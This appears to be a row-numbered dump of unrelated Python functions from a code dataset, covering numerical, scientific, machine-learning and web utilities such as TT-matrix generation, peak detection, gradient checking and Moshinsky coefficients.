stabilized_frame = _scale_around_center(stabilized_frame)
return stabilized_frame | 5,334,267 |
def _check_nvidia_driver_version(args):
"""If --nvidia-driver-version is set, warn that it is ignored."""
if args.nvidia_driver_version:
print('***WARNING: The --nvidia-driver-version flag is deprecated and will '
'be ignored.') | 5,334,268 |
def run_check(cmd: typing.Sequence[typing.Union[os.PathLike, str]], *,
input_lines: typing.Optional[BytesOrStrIterator] = ...,
encoding: typing.Optional[str] = ...,
capture_output: bool = ...,
quiet: bool = ...,
**kwargs) -> subprocess.CompletedProcess:
"""Accept bytes or string input_lines depending on ``encoding``.""" | 5,334,269 |
def TEMA(equity, start=None, end=None, timeperiod=30):
"""Triple Exponential Moving Average
:param timeperiod:
:return:
"""
close = np.array(equity.hp.loc[start:end, 'close'], dtype='f8')
real = talib.TEMA(close, timeperiod=timeperiod)
return real | 5,334,270 |
def get_miner_pool_by_owner_id():
"""
存储提供者详情
:return:
"""
owner_id = request.form.get("owner_id")
data = MinerService.get_miner_pool_by_no(owner_id)
return response_json(data) | 5,334,271 |
def notFound(e):
"""View for 404 page."""
return render_template('content/notfound.jinja.html'), 404 | 5,334,272 |
def watch_graph_with_blacklists(run_options,
graph,
debug_ops="DebugIdentity",
debug_urls=None,
node_name_regex_blacklist=None,
op_type_regex_blacklist=None):
"""Add debug tensor watch options, blacklisting nodes and op types.
This is similar to watch_graph(), but the node names and op types can be
blacklisted, instead of whitelisted.
Args:
run_options: An instance of tensorflow.core.protobuf.config_pb2.RunOptions
graph: An instance of tensorflow.python.framework.ops.Graph
debug_ops: Name of the debug op to use. Default: "DebugIdentity".
Can be a list of strings of a single string. The latter case is
equivalent to a list of a single string.
debug_urls: Debug urls. Can be a list of strings, a single string, or
None. The case of a single string is equivalen to a list consisting
of a single string.
node_name_regex_blacklist: Regular-expression blacklist for node_name.
This should be a string, e.g., "(weight_[0-9]+|bias_.*)"
op_type_regex_blacklist: Regular-expression blacklist for the op type of
nodes. If both node_name_regex_blacklist and op_type_regex_blacklist
are none, the two filtering operations will occur in an "OR"
relation. In other words, a node will be excluded if it hits either of
the two blacklists; a node will be included if and only if it hits
none of the blacklists. This should be a string, e.g.,
"(Variable|Add)".
"""
if isinstance(debug_ops, str):
debug_ops = [debug_ops]
if node_name_regex_blacklist:
node_name_pattern = re.compile(node_name_regex_blacklist)
else:
node_name_pattern = None
if op_type_regex_blacklist:
op_type_pattern = re.compile(op_type_regex_blacklist)
else:
op_type_pattern = None
ops = graph.get_operations()
for op in ops:
# Skip nodes without any output tensors.
if not op.outputs:
continue
node_name = op.name
op_type = op.type
if node_name_pattern and node_name_pattern.match(node_name):
continue
if op_type_pattern and op_type_pattern.match(op_type):
continue
for slot in xrange(len(op.outputs)):
add_debug_tensor_watch(
run_options,
node_name,
output_slot=slot,
debug_ops=debug_ops,
debug_urls=debug_urls) | 5,334,273 |
def get_stay(admission_date, exit_date):
"""Method to get exit date."""
try:
if not exit_date:
exit_date = datetime.now().date()
no_days = exit_date - admission_date
# Get More
years = ((no_days.total_seconds()) / (365.242 * 24 * 3600))
years_int = int(years)
months = (years - years_int) * 12
months_int = int(months)
days = (months - months_int) * (365.242 / 12)
days_int = int(days)
years_val = '' if years_int == 0 else '%s years ' % (years_int)
mon_check = years_int > 0 and months_int > 0
months_val = '%s months ' % (months_int) if mon_check else ''
pds = '%s%s%s days' % (years_val, months_val, days_int)
except Exception as e:
print('Error calculating exit - %s' % str(e))
return None
else:
return pds | 5,334,274 |
def compress(X, halve, g = 0, indices = None):
"""Returns Compress coreset of size 2^g sqrt(n) or, if indices is not None,
of size 2^g sqrt(len(indices)) as row indices into X
Args:
X: Input sequence of sample points with shape (n, d)
halve: Algorithm that takes an input a set of points and returns indices a set of indices to a subset of points with cardinality half of the input set
g: Oversampling parameter, a nonnegative integer
indices: If None, compresses X and returns coreset of size 2^g sqrt(n);
otherwise, compresses X[indices] and returns coreset of size
2^g sqrt(len(indices))
"""
# Check if indices is None in which case it sets it to range(size(X))
if indices is None:
indices = np.arange(X.shape[0], dtype=int)
# If the number of input points matches the target coreset size, we're done
if len(indices) == 4**g:
return indices
else:
# Partition the set input indices into four disjoint sets
partition_set = np.array_split(indices,4)
# Initialize an array to hold outputs of recursive calls
compress_outputs = []
for x in partition_set:
# Recursively call compress on the four subsets and
# add its output to the list
compress_output = compress(X, halve, g, indices = x)
compress_outputs.append(compress_output)
# Merge outputs of the recursive calls to compress
combined_compress_output = np.concatenate(compress_outputs)
# Run halving on the combined output
indices_into_combined = halve(X[combined_compress_output])
# Return indices into the original input set X
return combined_compress_output[indices_into_combined] | 5,334,275 |
def filter_objects(objs, labels, none_val=0):
"""Keep objects specified by label list"""
out = objs.copy()
all_labels = set(nonzero_unique(out))
labels = set(labels)
remove_labels = all_labels - labels
for l in remove_labels:
remove_object(out, l)
return out | 5,334,276 |
def print_rule(rule,counter):
""" Helper function to print a rule """
print ("------------------------------------------------")
print (" NORM Number={}".format(str(counter)))
print ("------------------------------------------------")
if rule[0]=="Per":
print (" > PERMITTED to "+rule[1][2][1].upper())
print (" "+rule[2][1][1].upper()+"-"+rule[2][2][1].upper()+'s in ZONE-'+rule[1][1][1])
elif rule[0]=="Pro":
print (" > PROHIBITED to "+rule[1][2][1].upper())
print (" "+rule[2][1][1].upper()+"-"+rule[2][2][1].upper()+'s in ZONE-'+rule[1][1][1])
else:
print (" > OBLIGATORY to")
print (" "+rule[2][1][1].upper()+" "+rule[1][1][1][1].upper()+"-"+rule[1][1][2][1].upper()+'s in ZONE-'+rule[2][2][1])
print (" if you "+rule[1][2][1].upper()+" "+rule[1][1][1][1].upper()+"-"+rule[1][1][2][1].upper()+'s') | 5,334,277 |
def test_restarting_completed_job(spark_client, feature_table):
""" Job has succesfully finished on previous try """
job = SimpleStreamingIngestionJob(
"", "default", feature_table, SparkJobStatus.COMPLETED
)
spark_client.feature_store.list_feature_tables.return_value = [feature_table]
spark_client.list_jobs.return_value = [job]
ensure_stream_ingestion_jobs(spark_client, all_projects=True)
assert spark_client.start_stream_to_online_ingestion.call_count == 2 | 5,334,278 |
def get_index_freq(freqs, fmin, fmax):
"""Get the indices of the freq between fmin and fmax in freqs
"""
f_index_min, f_index_max = -1, 0
for freq in freqs:
if freq <= fmin:
f_index_min += 1
if freq <= fmax:
f_index_max += 1
# Just check if f_index_max is not out of bound
f_index_max = min(len(freqs) - 1, f_index_max)
f_index_min = max(0, f_index_min)
return f_index_min, f_index_max | 5,334,279 |
def get_gene_mod(gene_id, marker_id):
"""Retrieves a GeneMod model if the gene / marker pair already exists,
or creates a new one
"""
if gene_id in ("None", None):
gene_id = 0
if marker_id in ("None", None):
marker_id = 0
gene_mod = GeneMod.query.filter_by(gene_id=gene_id, marker_id=marker_id).first()
if gene_mod:
log.info("Found gene_mod for gene %s and marker %s", gene_id, marker_id)
return gene_mod
gene = Gene.get_by_id(gene_id)
marker = Marker.get_by_id(marker_id)
if not (gene or marker):
return None
gene_label = gene.label if gene else ""
gene_id = gene.bioportal_id if gene else ""
marker_label = marker.label if marker else ""
marker_id = marker.bioportal_id if marker else ""
user_id = gene.user_id if gene else marker.user_id
group_id = gene.group_id if gene else marker.group_id
label = f"{gene_label}-{marker_label}"
bioportal_id = f"{gene_id}-{marker_id}"
gene_mod = GeneMod(
label=label,
bioportal_id=bioportal_id,
user_id=user_id,
group_id=group_id,
)
if gene:
gene_mod.update(gene=gene, gene_id=gene_id, commit=False)
if marker:
gene_mod.update(marker=marker, marker_id=marker_id, commit=False)
gene_mod.save()
return gene_mod | 5,334,280 |
def random_matrix(shape, tt_rank=2, mean=0., stddev=1.,
dtype=tf.float32, name='t3f_random_matrix'):
"""Generate a random TT-matrix of the given shape with given mean and stddev.
Entries of the generated matrix (in the full format) will be iid and satisfy
E[x_{i1i2..id}] = mean, Var[x_{i1i2..id}] = stddev^2, but the distribution is
in fact not Gaussian.
In the current implementation only mean 0 is supported. To get
a random_matrix with specified mean but tt_rank greater by 1 you can call
x = t3f.random_matrix(shape, tt_rank, stddev=stddev)
x = mean * t3f.ones_like(x) + x
Args:
shape: 2d array, shape[0] is the shape of the matrix row-index,
shape[1] is the shape of the column index.
shape[0] and shape[1] should have the same number of elements (d)
Also supports omitting one of the dimensions for vectors, e.g.
random_matrix([[2, 2, 2], None])
and
random_matrix([None, [2, 2, 2]])
will create an 8-element column and row vectors correspondingly.
tt_rank: a number or a (d+1)-element array with ranks.
mean: a number, the desired mean for the distribution of entries.
stddev: a number, the desired standard deviation for the distribution of
entries.
dtype: [tf.float32] dtype of the resulting matrix.
name: string, name of the Op.
Returns:
TensorTrain containing a TT-matrix of size
np.prod(shape[0]) x np.prod(shape[1])
"""
# TODO: good distribution to init training.
# In case the shape is immutable.
shape = list(shape)
# In case shape represents a vector, e.g. [None, [2, 2, 2]]
if shape[0] is None:
shape[0] = np.ones(len(shape[1]), dtype=int)
# In case shape represents a vector, e.g. [[2, 2, 2], None]
if shape[1] is None:
shape[1] = np.ones(len(shape[0]), dtype=int)
shape = np.array(shape)
tt_rank = np.array(tt_rank)
_validate_input_parameters(is_tensor=False, shape=shape, tt_rank=tt_rank)
num_dims = shape[0].size
if tt_rank.size == 1:
tt_rank = tt_rank * np.ones(num_dims - 1)
tt_rank = np.concatenate([[1], tt_rank, [1]])
tt_rank = tt_rank.astype(int)
var = np.prod(tt_rank)
# Empirically entries of a TT tensor with cores initialized from N(0, 1)
# will have variances np.prod(tt_rank) and mean 0.
# We scale each TT-core to obtain the desired stddev
cr_exponent = -1.0 / (2 * num_dims)
var = np.prod(tt_rank ** cr_exponent)
core_stddev = stddev ** (1.0 / num_dims) * var
with tf.name_scope(name):
tt = matrix_with_random_cores(shape, tt_rank=tt_rank, stddev=core_stddev,
dtype=dtype)
if np.abs(mean) < 1e-8:
return tt
else:
raise NotImplementedError('non-zero mean is not supported yet') | 5,334,281 |
def set_dict_defaults_inplace(dct, *args):
"""
Modifies a dictionary in-place by populating key/value pairs present in the
default dictionaries which have no key in original dictionary `dct`. Useful
for passing along keyword argument dictionaries between functions.
Parameters
----------
dct: dict
*args: dictionaries
Returns
-------
dct: (possibly modified) input dictionary
Examples
--------
>>> d = {1: None}
>>> set_dict_defaults_inplace(d, {2: []})
>>> d == {1: None, 2: []}
True
>>> f = {'a': 1, 'b': 3}
>>> g = {'a': 1}
>>> set_dict_defaults_inplace(g, {'b': 2, 'a': 7}, {'b': 3})
>>> f == g
True
>>> h = {42: True, 'b': 3}
>>> i = {}
>>> set_dict_defaults_inplace(i, {42: True, 'b': 2}, {'b': 3})
>>> h == i
True
"""
ori_dct_keys = dct.keys()
new_dct = {}
for defaults in args:
for k, v in defaults.items():
if k not in ori_dct_keys:
new_dct[k] = v
dct.update(new_dct) | 5,334,282 |
def triangulate_polylines(polylines, holePts, lowQuality = False, maxArea = 0.01):
"""
Convenience function for triangulating a polygonal region using the `triangle` library.
Parameters
----------
polylines
List of point lists, each defining a closed polygon (with coinciding
first and last points) to triangulate.
holePts
A single point within each polygonal region that should be interpreted
as a hole. These regions will be omitted from the output triangulation.
lowQuality
Prohibit the insertion of any Steiner points, creating a low-quality
triangulation that be used for traversal/topological queries.
maxArea
Area threshold for refining triangles; ignored if lowQuality is True.
Returns
-------
V, F
Indexed face set representation of the output triangle mesh.
"""
lV, lE = mesh_operations.mergedMesh([mesh_operations.polylineToLineMesh(p) for p in polylines])
omitQualityFlag, flags = False, ""
if lowQuality: omitQualityFlag, flags = True, "YYS0"
V, F, markers = triangulation.triangulate(lV, lE, holePts=holePts, triArea=maxArea, omitQualityFlag=omitQualityFlag, flags=flags)
return V, F | 5,334,283 |
def inclination(x, y, z, u, v, w):
"""Compute value of inclination, I.
Args:
x (float): x-component of position
y (float): y-component of position
z (float): z-component of position
u (float): x-component of velocity
v (float): y-component of velocity
w (float): z-component of velocity
Returns:
float: inclination, I
"""
my_hz = x*v-y*u
my_h = np.sqrt( (y*w-z*v)**2 + (z*u-x*w)**2 + (x*v-y*u)**2 )
return np.arccos(my_hz/my_h) | 5,334,284 |
def test_ConstantsValues():
"""Test :mod:`~utilipy.constants.values.ConstantsValues`."""
# ----------------------------
# Frozen
f = values.ConstantsValues(frozen=True)
assert f.from_frozen is True
_names = set(data.__all_constants__)
_names.update({"c_ms", "c_kms", "AU_to_pc", "pc_to_AU"})
assert f._names == _names
# standard constants
C = frozenconstants
for name in data.__all_constants__:
assert getattr(f, name) == C[name].value
# __getitem__
assert f[name] == C[name].value
# ----------------------------
# Not Frozen
# TODO
return | 5,334,285 |
def tile_bbox(bbox, grid_width):
"""
Tile bbox into multiple sub-boxes, each of `grid_width` size.
>>> list(tile_bbox((-1, 1, 0.49, 1.51), 0.5)) #doctest: +NORMALIZE_WHITESPACE
[(-1.0, 1.0, -0.5, 1.5),
(-1.0, 1.5, -0.5, 2.0),
(-0.5, 1.0, 0.0, 1.5),
(-0.5, 1.5, 0.0, 2.0),
(0.0, 1.0, 0.5, 1.5),
(0.0, 1.5, 0.5, 2.0)]
"""
min_x = math.floor(bbox[0]/grid_width) * grid_width
min_y = math.floor(bbox[1]/grid_width) * grid_width
max_x = math.ceil(bbox[2]/grid_width) * grid_width
max_y = math.ceil(bbox[3]/grid_width) * grid_width
x_steps = math.ceil((max_x - min_x) / grid_width)
y_steps = math.ceil((max_y - min_y) / grid_width)
for x in xrange(int(x_steps)):
for y in xrange(int(y_steps)):
yield (
min_x + x * grid_width,
min_y + y * grid_width,
min_x + (x + 1) * grid_width,
min_y + (y + 1)* grid_width,
) | 5,334,286 |
def OctahedralGraph():
"""
Return an Octahedral graph (with 6 nodes).
The regular octahedron is an 8-sided polyhedron with triangular faces. The
octahedral graph corresponds to the connectivity of the vertices of the
octahedron. It is the line graph of the tetrahedral graph. The octahedral is
symmetric, so the spring-layout algorithm will be very effective for
display.
PLOTTING: The Octahedral graph should be viewed in 3 dimensions. We choose
to use a planar embedding of the graph. We hope to add rotatable,
3-dimensional viewing in the future. In such a case, a argument will be
added to select the desired layout.
EXAMPLES:
Construct and show an Octahedral graph::
sage: g = graphs.OctahedralGraph()
sage: g.show() # long time
Create several octahedral graphs in a Sage graphics array They will be drawn
differently due to the use of the spring-layout algorithm::
sage: g = []
sage: j = []
sage: for i in range(9):
....: k = graphs.OctahedralGraph()
....: g.append(k)
sage: for i in range(3):
....: n = []
....: for m in range(3):
....: n.append(g[3*i + m].plot(vertex_size=50, vertex_labels=False))
....: j.append(n)
sage: G = graphics_array(j)
sage: G.show() # long time
"""
adj = {0: [1, 2, 3, 4], 1: [2, 3, 5], 2: [4, 5], 3: [4, 5], 4: [5]}
G = Graph(adj, format='dict_of_lists', name="Octahedron")
G._circle_embedding([0, 1, 2], radius=5, angle=pi/2)
G._circle_embedding([4, 3, 5], radius=1, angle=pi/6)
return G | 5,334,287 |
def peak_detect(y, delta, x=None):
""" Find local maxima in y.
Args:
y (array): intensity data in which to look for peaks
delta (float): a point is considered a maximum peak if it has the maximal value, and was preceded (to the left) by a value lower by DELTA.
x (array, optional): correspond x-axis
Returns:
tuple containing:
- *array*: indices of peaks / the x-values of peaks if x arg was passed
- *array* : y values of peaks
References:
Converted from MATLAB script at http://billauer.co.il/peakdet.html.
"""
maxtab = []
mintab = []
if x is None:
x = np.arange(len(y))
y = np.asarray(y)
mn, mx = np.Inf, -np.Inf
mnpos, mxpos = np.NaN, np.NaN
lookformax = True
for i in np.arange(len(y)):
this = y[i]
if this > mx:
mx = this
mxpos = x[i]
if this < mn:
mn = this
mnpos = x[i]
if lookformax:
if this < mx - delta:
maxtab.append((mxpos, mx))
mn = this
mnpos = x[i]
lookformax = False
else:
if this > mn + delta:
mintab.append((mnpos, mn))
mx = this
mxpos = x[i]
lookformax = True
return np.array(maxtab) | 5,334,288 |
def quadruplet_fixated_egomotion( filename ):
"""
Given a filename that contains 4 different point-view combos, parse the filename
and return the pair-wise camera pose.
Parameters:
-----------
filename: a filename in the specific format.
Returns:
-----------
egomotion: a numpy array of length 36 (6x6).
(a concatanation of 6 6-DOF relative camera pose vector)
"""
if isinstance(filename, list):
raise ValueError("Having more than two inputs to a fixated camera pose problem")
full_paths = parse_fixated_filename(filename)
if len(full_paths) != 4 :
raise ValueError("quadruplet first view prediction with list shorter than 4")
# perm = random.shuffle(range(4))
# full_paths = [full_paths[i] for i in perm]
poses = []
for i in range(3):
for j in range(i+1, 4):
pose = calculate_relative_camera_pose(full_paths[i], full_paths[j])
poses.append(pose)
poses = np.hstack(poses)
return poses | 5,334,289 |
def test_filter_log_entries_incomplete_entries():
"""
Checks if filter removes incomplete entries.
"""
filter_instance = _create_log_filter()
entries = [
{
'some_field': 'value0',
'filtered_field': 'no filter0',
'additional_field': ''
},
{
'some_field': '',
'filtered_field': 'no filter1'
},
{
'filtered_field': 'no filter2'
}
]
expected_entries = copy.deepcopy(entries[:1])
filter_instance.filter_log_entries(entries)
assert entries == expected_entries | 5,334,290 |
def moshinsky(state1,state2,stater,statec,state,type):
"""
calculates the moshinsky coefficients used to transform between the two-particle and relative-center of mass frames.
w1 x w2->w
wr x wc->w
type can be either "SU3" or "SO3"
if type=="SU3":
state1,state2,stater,statec,state are simply SU3State class
if type=="SO3" then state1 etc are (n1,L1) where N1=2*n1+L1 and w1=SU3State(N1,0)
state=L
"""
mosh=0
if type=="SU3":
#check SU3 coupling
if u3.mult(state1,state2,state)*u3.mult(stater,statec,state)!=0:
mosh=mosh_SU3(state1,state2,stater,statec,state)
if type=="SO3":
#check that angular momentum coupling is allowed and that N1+N2=Nr+Nc
(n1,L1)=state1
(n2,L2)=state2
(nr,Lr)=stater
(nc,Lc)=statec
L=state
if (so3.mult(L1,L2,L)!=0) and (so3.mult(Lc,Lr,L)!=0) and ((2*n1+L1+2*n2+L2)==(2*nr+Lr+2*nc+Lc)):
mosh=mosh_SO3((n1,L1),(n2,L2),(nr,Lr),(nc,Lc),L)
return mosh | 5,334,291 |
def test_lie_algebra_nqubits_check():
"""Test that we warn if the system is too big."""
@qml.qnode(qml.device("default.qubit", wires=5))
def circuit():
qml.RY(0.5, wires=0)
return qml.expval(qml.Hamiltonian(coeffs=[-1.0], observables=[qml.PauliX(0)]))
with pytest.warns(UserWarning, match="The exact Riemannian gradient is exponentially"):
LieAlgebraOptimizer(circuit=circuit, stepsize=0.001) | 5,334,292 |
def _write_k_file(output_k, causal_snp_number):
"""
Writes the Casual SNP K file.
Let's just write the file that I used in the example.
0.6 0.3 0.1
"""
# Write the number of K files.
causal_snp_number = 3
threshold = 1.0/(causal_snp_number)
thresh_list = [threshold] * causal_snp_number
thresh_list = [str(o) for o in thresh_list]
with open(output_k, 'w') as out:
out.write(" ".join(thresh_list) + "\n") | 5,334,293 |
def get_elastic_apartments_not_for_sale():
"""
Get apartments not for sale but with published flags
"""
s_obj = (
ApartmentDocument.search()
.filter("term", publish_on_oikotie=True)
.filter("term", publish_on_etuovi=True)
.filter("term", apartment_state_of_sale__keyword=ApartmentStateOfSale.RESERVED)
)
s_obj.execute()
scan = s_obj.scan()
uuids = []
for hit in scan:
uuids.append(hit.uuid)
return uuids | 5,334,294 |
def promptYesNoCancel(prompt, prefix=''):
"""Simple Yes/No/Cancel prompt
:param prompt: string, message to the user for selecting a menu entry
:param prefix: string, text to print before the menu entry to format the display
:returns: string, menu entry text
"""
menu = [
{'index': 1, 'text': 'Yes', 'type': 'YES'},
{'index': 2, 'text': 'No', 'type': 'NO'},
{'index': 3, 'text': 'Cancel', 'type': 'EXIT'}
]
return promptSimple(menu, prompt, prefix) | 5,334,295 |
def gradcheck_naive(f, x):
"""
Implements a manual gradient check: this functions is used as a helper function in many places
- f should be a function that takes a single argument and outputs the cost and its gradients
- x is the point (numpy array) to check the gradient at
"""
rndstate = random.getstate()
random.setstate(rndstate)
fx, grad = f(x) # Evaluate function value at original point
h = 1e-4
# Iterate over all indexes in x
it = np.nditer(x, flags=['multi_index'], op_flags=['readwrite'])
while not it.finished:
ix = it.multi_index
# modifying x[ix] with h defined above to compute numerical gradients
# make sure you call random.setstate(rndstate) before calling f(x) each time, this will make it
# possible to test cost functions with built in randomness later
oldvalue = x[ix]
x[ix] = oldvalue + h
random.setstate(rndstate)
fxh, _ = f(x)
x[ix] = oldvalue - h
random.setstate(rndstate)
fxnh, _ = f(x)
numgrad = ((fxh - fxnh) / 2.0) / h
x[ix] = oldvalue
# Compare gradients
reldiff = abs(numgrad - grad[ix]) / max(1, abs(numgrad), abs(grad[ix]))
if reldiff > 1e-5:
print "Gradient check failed."
print "First gradient error found at index %s" % str(ix)
print "Your gradient: %f \t Numerical gradient: %f" % (grad[ix], numgrad)
return False
it.iternext() # Step to next dimension
print "Gradient check passed!"
return True | 5,334,296 |
def cal_mae_loss(logits, gts, reduction):
"""
:param preds: (N,C,H,W) logits predicted by the model.
:param gts: (N,1,H,W) ground truths.
:param reduction: specifies how all element-level loss is handled.
:return: mae loss
"""
probs = logits.sigmoid()
loss = (probs - gts).abs()
return reduce_loss(loss, reduction) | 5,334,297 |
def runserver():
"""Run CRIPTs using the built-in runserver."""
with cd(APP_ROOT):
run("python manage.py runserver 0.0.0.0:8080") | 5,334,298 |
def divideByFirstColumn(matrix):
"""This function devide a matrix by its first column to resolve
wrong intemsity problems"""
result = (matrix.T / matrix.sum(axis=1)).T
return result | 5,334,299 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.